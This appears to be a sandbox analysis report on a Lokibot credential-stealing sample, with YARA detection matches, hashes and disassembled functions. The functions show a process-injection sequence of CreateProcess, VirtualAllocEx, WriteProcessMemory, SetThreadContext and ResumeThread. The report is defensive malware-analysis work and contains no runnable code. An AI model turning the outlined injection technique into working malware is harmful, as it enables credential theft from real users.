Show Windows behavior

Target ID:	12
Start time:	07:52:08
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"
Imagebase:	0xdd0000
File size:	601'088 bytes
MD5 hash:	2F402635E17B4F0D9C0D6922D384936A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	212
Total number of Limit Nodes:	17

Executed Functions

Function 04FB6CE8 Relevance: .9, Instructions: 851COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069457895.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c596422f92136efcdc34fcb4c1a40bcbb9dda63a261b2e5564cef97e28d50f0
Instruction ID: 93de0ebe17061348c945c81589a788bca4220dde978946c5424da7bdbafef70e
Opcode Fuzzy Hash: 4c596422f92136efcdc34fcb4c1a40bcbb9dda63a261b2e5564cef97e28d50f0
Instruction Fuzzy Hash: B992C634A40219CFDB24DF64C994AE9B7B1FF8A305F1181E9D909AB361DB31AE85CF41

Function 04FB6CE1 Relevance: .8, Instructions: 848COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069457895.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efcba28845b373103a1f3535f22ad682f6dc2fa2387c134b92aea4292c294b1b
Instruction ID: 3aaa8c139ec7cdf9e37f90dbe0bb01d998eea9193bf0b8b0ef4b312bd0376a2e
Opcode Fuzzy Hash: efcba28845b373103a1f3535f22ad682f6dc2fa2387c134b92aea4292c294b1b
Instruction Fuzzy Hash: D192C734A40219CFDB24DF64C994AE9B7B1FF8A305F1181E9D909AB361DB31AE85CF41

Function 0720C6D8 Relevance: .6, Instructions: 621COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f5fc53e36009afa6f795557a903019cf6d21a46f57c181184d845cf25a01d1a
Instruction ID: 663b688345780e5375549d9a6e5e57c05da2c565ee3d87385c0bd4dffae3ffbb
Opcode Fuzzy Hash: 2f5fc53e36009afa6f795557a903019cf6d21a46f57c181184d845cf25a01d1a
Instruction Fuzzy Hash: F832ACB5B112098FDB19DB68C460BAEB7F6AF89300F244569E505DB3A1CF34ED41CBA1

Function 07207AF5 Relevance: 1.8, APIs: 1, Instructions: 251
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07207D36

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c48130c0b8911899e7f35570a5ab35bd1867627a8ce7238a326e8a48b5f35643
Instruction ID: 255b96eb4e86f425a1012de736f6be6e041e510459fe7a166fae0da184976453
Opcode Fuzzy Hash: c48130c0b8911899e7f35570a5ab35bd1867627a8ce7238a326e8a48b5f35643
Instruction Fuzzy Hash: 9EA13CB1D1021ACFDF24DF68C8417EDBBB6BF44314F1485A9D809A7290DB74A985CFA1

Function 07207B00 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07207D36

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ec2a5e65c40b4124030546dfc86b967ed667fecd31e4571cc116ff961a3f1b15
Instruction ID: 88bb28b5b801f8776a1f6b5fae67be058d73ba2ead423e34d269537fdfb28c1e
Opcode Fuzzy Hash: ec2a5e65c40b4124030546dfc86b967ed667fecd31e4571cc116ff961a3f1b15
Instruction Fuzzy Hash: 26914DB1D1021ACFDF14DF68C841BADBBB2BF48314F1485A9D809A7390DB74A985CFA1

Function 0284AE28 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0284B07E

Memory Dump Source

Source File: 00000000.00000002.2053072488.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2840000_FVR-N2411-07396.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: bbe86be82b5b5541bcc5060a0315b4f7afc07e675ec211839932f501b927da82
Instruction ID: 12031e06b556db0e8622490ed3c4bdc4ac2ecfa0a4b8c32d8373caa568f39d30
Opcode Fuzzy Hash: bbe86be82b5b5541bcc5060a0315b4f7afc07e675ec211839932f501b927da82
Instruction Fuzzy Hash: 227138B8A00B098FD728DF29D05475ABBF5FF88304F008A2DD49ADBA50DB75E845CB91

Function 028444B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 028459C9

Memory Dump Source

Source File: 00000000.00000002.2053072488.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2840000_FVR-N2411-07396.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6edbb59590f4e45778a8b33a813bcbbb979438877a44edb5ec0b3c0a98d5db83
Instruction ID: fd1de9ae4a8dff15d6c7fbf6144851bfb919107d75db4a9564491d0342b385c2
Opcode Fuzzy Hash: 6edbb59590f4e45778a8b33a813bcbbb979438877a44edb5ec0b3c0a98d5db83
Instruction Fuzzy Hash: AD41E3B4C0071DCBDB24DFA9C844B9EBBB5BF49304F60805AD409AB255DB79694ACF90

Function 0284590C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 028459C9

Memory Dump Source

Source File: 00000000.00000002.2053072488.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2840000_FVR-N2411-07396.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1f3dbf4cd171f0dcd61abe26bb9e624090931a4c851a718112c09fe2aa4bf877
Instruction ID: 9cab8137642e74b9c82b2d4d4b96a5942cf9d81d36ebfcd5336e8af07047d681
Opcode Fuzzy Hash: 1f3dbf4cd171f0dcd61abe26bb9e624090931a4c851a718112c09fe2aa4bf877
Instruction Fuzzy Hash: 3741E1B4C0061DCBDB24DFA9C984BCDBBB5BF49304F60806AD418AB254DB79694ACF90

Function 04FB4040 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04FB4101

Memory Dump Source

Source File: 00000000.00000002.2069457895.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_FVR-N2411-07396.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 06402aeafc48d270204b90f927a07a24395b6a8eefc4d5387d3c4e178b677e4e
Instruction ID: e7675ab7e102e3ad104b98d93db6a084cd70376b1e4b607893891cf219904af9
Opcode Fuzzy Hash: 06402aeafc48d270204b90f927a07a24395b6a8eefc4d5387d3c4e178b677e4e
Instruction Fuzzy Hash: D8414CB4A00309DFDB14CF9AC448AAABBF5FF89314F24C458D559A7322D374A841CFA0

Function 02845A84 Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2053072488.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2840000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1493977388cf241fdd24581905e6deee974d885d8dee3ef8efde27723482da8
Instruction ID: eae01ac61dae8bb796b2cb13e8f50e647c796e84fe4a926e5d1fba87c46d6622
Opcode Fuzzy Hash: a1493977388cf241fdd24581905e6deee974d885d8dee3ef8efde27723482da8
Instruction Fuzzy Hash: 0C31BCB880464DCFEB11DFA8C85479DBBF1EF56308F94418AC405AB2A5CB79A94ACB01

Function 07207870 Relevance: 1.6, APIs: 1, Instructions: 77
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07207908

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4f9e1b2a372f1a48b69f4641f362c0f9bc970f5d5dc0c0ae9f42da64efa1ea10
Instruction ID: d681481922de5e001f72bc33f050d65a522dab7b5b6dfce2c965bcb862b3bcfe
Opcode Fuzzy Hash: 4f9e1b2a372f1a48b69f4641f362c0f9bc970f5d5dc0c0ae9f42da64efa1ea10
Instruction Fuzzy Hash: 973138B590020D9FCB10DFAAC845AEEBBF5FF48320F108429E959A7291D7789544DBA0

Function 07207878 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07207908

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 877456dfe9c391dc66cc7b299d1fc7e0b8a257857d0760ac00fd3cb3f5c44620
Instruction ID: 1e258ef445c4b230f828771ad74108f76876080951bf86817e306ccb6682ef15
Opcode Fuzzy Hash: 877456dfe9c391dc66cc7b299d1fc7e0b8a257857d0760ac00fd3cb3f5c44620
Instruction Fuzzy Hash: CF2126B190034D9FCB10DFAAC985BEEBBF5FF48310F108429E919A7251D778A944CBA4

Function 072076D8 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0720775E

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 6a72db16658a82b4527dc94bcd9b69cb335c16e05c74833b6656f2045de750e9
Instruction ID: 1c099263761268329318dc97bba6122b356978bc9485d05210a2478e0266557c
Opcode Fuzzy Hash: 6a72db16658a82b4527dc94bcd9b69cb335c16e05c74833b6656f2045de750e9
Instruction Fuzzy Hash: 2C215CB59003498FDB10DFAAC4857EEBBF4EF48364F108429D459A7341D778A584CFA1

Function 0284D2FC Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0284D6D6,?,?,?,?,?), ref: 0284D797

Memory Dump Source

Source File: 00000000.00000002.2053072488.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2840000_FVR-N2411-07396.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2655791100f26d014f3f909f7e6e1e1431b37fcb999d6d6542fef718ba4997c9
Instruction ID: 4b95bd8650c830657767692876479924f3f95f27372b707210ee064867e8c2df
Opcode Fuzzy Hash: 2655791100f26d014f3f909f7e6e1e1431b37fcb999d6d6542fef718ba4997c9
Instruction Fuzzy Hash: ED21E6B590024C9FDB10CF9AD584ADEFBF8FB48314F14845AE918A3310D778A954CFA4

Function 07207961 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072079E8

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 523a3001835ea64c6e90cd0992d0a5aec9e99df1c189a7d8318d58ee26fa5c1a
Instruction ID: b3e5f582eae410100a48c96c4071be1ec23779b527fa4055305d117eee7d0d7b
Opcode Fuzzy Hash: 523a3001835ea64c6e90cd0992d0a5aec9e99df1c189a7d8318d58ee26fa5c1a
Instruction Fuzzy Hash: 022128B1C00249DFDB10DFAAC985AEEBBF5FF48320F108429E559A7250D7389544CBA4

Function 0284D709 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0284D6D6,?,?,?,?,?), ref: 0284D797

Memory Dump Source

Source File: 00000000.00000002.2053072488.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2840000_FVR-N2411-07396.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 023bf813792a58914ca7dc5e4322394ada5be8f23a50eeede2bc38108ff1d0dd
Instruction ID: 2aa812ceb613eba2764029ed858eb2d35a019d6c31e0d8723959d8249471f0fc
Opcode Fuzzy Hash: 023bf813792a58914ca7dc5e4322394ada5be8f23a50eeede2bc38108ff1d0dd
Instruction Fuzzy Hash: 3921E4B59002499FDB10CFAAD584AEEBFF4FB48324F14845AE918A3311D378A944CFA5

Function 072076E0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0720775E

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 83d7889780b2776c003e520cffc6effe9fce8dc0dfb4e7946fc52f70cf6004fa
Instruction ID: 0970a9a486e4cc5bdc98184437ba006bad53d7940c1d8e1f17063c646bcb8eaa
Opcode Fuzzy Hash: 83d7889780b2776c003e520cffc6effe9fce8dc0dfb4e7946fc52f70cf6004fa
Instruction Fuzzy Hash: DC2135B19003098FDB10DFAAC485BAEBBF4EF48324F10842AD419A7351DB78A944CFA4

Function 07207968 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072079E8

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 12d346995bace78c7e6cd153339875968b7f76795b81b9f3eaa69bc54f61080b
Instruction ID: b403c63b6ae299aff504816d344ed819fabe885d8e18948fdcd64a3295544f3a
Opcode Fuzzy Hash: 12d346995bace78c7e6cd153339875968b7f76795b81b9f3eaa69bc54f61080b
Instruction Fuzzy Hash: CB2109B1C003599FDB10DFAAC945AEEFBF5FF48310F508429E519A7250D778A544CBA4

Function 072077B0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07207826

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 50d9f7042de639935630728adca780d45aa785366fb7dd36dd33fc6fe0085a0e
Instruction ID: 489f3118e46fdb39cde2a1d61518df7245fb4de575346bcabec283f7285f9b03
Opcode Fuzzy Hash: 50d9f7042de639935630728adca780d45aa785366fb7dd36dd33fc6fe0085a0e
Instruction Fuzzy Hash: 961129B19002499FCF10DFAAD845AEFBFF5EF48320F208419E519A7250CB79A944CFA5

Function 07207628 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07207692

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c48ec00b3bab24e3a53ef0c042fda05fc144d2e19e311a6c2f057fef4a65e39e
Instruction ID: 4e8ff2ba4f6d6fe3bea329fce551a81f7353b51f96ea7e6d6dbd7abb0ffb868f
Opcode Fuzzy Hash: c48ec00b3bab24e3a53ef0c042fda05fc144d2e19e311a6c2f057fef4a65e39e
Instruction Fuzzy Hash: C61149B58003498FCB10DFAAD4457EEFBF5EF48324F108819D41AA7250DB39A584CBA4

Function 072077B8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07207826

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d4d2c349fadd50e70266f3e08b9274062f8756bb324014fa16d0de5ad1be2387
Instruction ID: 856419dc314ba5fb5b7b04e34f8587c0355d72247385ab01dc5029672f2eaf5e
Opcode Fuzzy Hash: d4d2c349fadd50e70266f3e08b9274062f8756bb324014fa16d0de5ad1be2387
Instruction Fuzzy Hash: 411137B18002499FCF10DFAAD844AEFBFF5EF48320F108819E519A7250C779A944CFA0

Function 07207630 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07207692

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 91dc219268c26ff8cd91d13bf23c30a71ded124f6f8e485987c18135dcd53bc3
Instruction ID: 183efef51079bb7be74ef873ee1913d80154fd09c956ac7bc42774775c0e19b7
Opcode Fuzzy Hash: 91dc219268c26ff8cd91d13bf23c30a71ded124f6f8e485987c18135dcd53bc3
Instruction Fuzzy Hash: 2E1128B19002498FDB14DFAAC4457AFFBF9EF88324F108419D519A7240CB79A544CBA4

Function 0720B94B Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0720B9AD

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1fc360fc8b63f2a64b081960b0272b961a5cc7625e52d4bb1dd03ad97fd1a08b
Instruction ID: 9e59ee077ac9ed9da303d78d24b103c10f47202ad712da8421d0d14240ba0312
Opcode Fuzzy Hash: 1fc360fc8b63f2a64b081960b0272b961a5cc7625e52d4bb1dd03ad97fd1a08b
Instruction Fuzzy Hash: 0F11F2B58002499FDB20DF9AD845BDEBFF8EB48320F10841AE518A7640C379A984CFA5

Function 0284B018 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0284B07E

Memory Dump Source

Source File: 00000000.00000002.2053072488.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2840000_FVR-N2411-07396.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c5ae2f32a497548a35d9881ac993c968206cb75f69785c00f365759927bf9ada
Instruction ID: 7a438f53b448087c515cd8a4e292c1f8f33ce9dff7ce345a33918823e0ef3f6f
Opcode Fuzzy Hash: c5ae2f32a497548a35d9881ac993c968206cb75f69785c00f365759927bf9ada
Instruction Fuzzy Hash: B211D2B9C002498FDB10DF9AD444A9EFBF4EB48718F10845AD529A7210D379A545CFA5

Function 07204458 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0720B9AD

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1dc4eccd8e794dc5f1d874bbff1d3fc6ec54b0b8c18057b941293353cb774457
Instruction ID: a0b77fec0388f15b3713453dd385d93954fd9cef2e8b2dd3e030b4423823559d
Opcode Fuzzy Hash: 1dc4eccd8e794dc5f1d874bbff1d3fc6ec54b0b8c18057b941293353cb774457
Instruction Fuzzy Hash: A411F2B581034D9FDB20DF9AD844BDEBBF8EB49320F108459E518A7241C379AA44CFE5

Function 027AD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052152556.00000000027AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27ad000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0c071fd91e7f8cab1324e7f757f69f62b37c3f55d0932696a37deacbe39ae7f
Instruction ID: b0f4ce63d01749d2a6903653c694749bda7b02a1f76344fde9db1d474a7f6b55
Opcode Fuzzy Hash: f0c071fd91e7f8cab1324e7f757f69f62b37c3f55d0932696a37deacbe39ae7f
Instruction Fuzzy Hash: 3A2103B1500204DFDB29DF54D9D0F26BF65FBD8324F20C669ED0A0B656C33AE456CAA2

Function 027BD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052197856.00000000027BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27bd000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e73e3d1abff68971e33b2e35f76e9f03c89ed8fa4b7f67e92d514b09a63973f
Instruction ID: 48631d94ea2de5f5c2e04c2bb19f781142b3a0cb0c778680bdc2eca8f87aa5b5
Opcode Fuzzy Hash: 8e73e3d1abff68971e33b2e35f76e9f03c89ed8fa4b7f67e92d514b09a63973f
Instruction Fuzzy Hash: 5921F275604204DFDB26DF24D9C4B66BF65FF88314F24C569E90A4B256C33AD407CA61

Function 027BD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052197856.00000000027BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27bd000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 117e1fb6aea842e87d1801450bf5d3a91910c4ce0cf6a6dfb2ab28a494263ec8
Instruction ID: f804eec73834bbdec9f72609d1245318391df9c2ba58977d60ffe118d8f130be
Opcode Fuzzy Hash: 117e1fb6aea842e87d1801450bf5d3a91910c4ce0cf6a6dfb2ab28a494263ec8
Instruction Fuzzy Hash: E721F271904284EFDB26DF64D9C4BA6BBA5FF88314F20C56DE9094B256C33AD806CB61

Function 027BD007 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052197856.00000000027BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27bd000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf8dae75349ada00d977c492a2fe1bd4629512b1018676f82883c98f02189735
Instruction ID: 43920338b23d68f5c9438431baea3886acffb6f7e1b2afc2c208c06951029222
Opcode Fuzzy Hash: cf8dae75349ada00d977c492a2fe1bd4629512b1018676f82883c98f02189735
Instruction Fuzzy Hash: E3215E755093808FDB13CF24D994755BF71EF46214F28C5DAD8898B6A7C33A980ACB62

Function 027AD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052152556.00000000027AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27ad000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 31ff7a1f5064d281fed1d674092c087e94645b32290c9f731bdacc280a856721
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 3D110376404240CFDB16CF00D5C4B16BF72FB84324F24C6A9DD090B656C33AE45ACBA2

Function 027BD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052197856.00000000027BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27bd000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
